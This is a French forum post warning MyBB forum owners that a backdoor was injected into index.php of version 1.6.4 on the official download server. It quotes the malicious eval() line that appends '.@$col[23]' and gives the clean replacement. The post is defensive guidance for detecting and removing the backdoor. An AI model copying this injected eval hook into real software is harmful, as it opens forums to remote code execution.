Mybb 1.6.4 potentielle faille de sécurité

[fuchie]

Bonjour à tous,

J'ai lu la nouvelle en regardant s'il n'existait pas de nouvelles mises à jour pour mon forum, et ça m'a étonné de ne pas voir de message à ce sujet ici, donc par prévention je vais quand même le signaler.

Il y a environ 1 mois (le 5 octobre), une faille de sécurité a été découverte sur mybb 1.6.4. Il s'agirait en réalité d'une personne tiers qui a réussi à modifier le fichier index.php sur les serveurs officiels de Mybb.com, et ce, dans le but d'y ajouter un code malicieux facilitant le hacking des forums. Tout le monde n'est pas touché, et les installations proposées sur ce forum ne le sont pas, mais bon, si vous avez téléchargé votre installation sur le site officiel anglais, il vaut mieux vérifier que vous avez les bons scripts.

Pour cela, allez dans index.php et recherchez le code suivant :

Code :

//Checks to make sure the user can login; they haven't had too many tries at logging in.
    //Function call is not fatal
    if(login_attempt_check(false) !== false)
    {
        eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);
    }

Si vous le trouvez, c'est que vous êtes "infectés", et pour régler le problème, remplacez simplement ce petit code par celui-là :

Code :

//Checks to make sure the user can login; they haven't had too many tries at logging in.
    //Function call is not fatal
    if(login_attempt_check(false) !== false)
    {
        eval("\$loginform = \"".$templates->get("index_loginform")."\";");
    }

Pensez à vérifier toutes vos installations, par exemple mon forum en lui-même n'était pas touché, mais mon installation en local l'était. Il suffit juste que les fichiers soient échangés et tout se retrouve infecté.

Sources => Ici (25 octobre) et ici

Voilà, voilà, je signalais juste au cas où, à bientôt.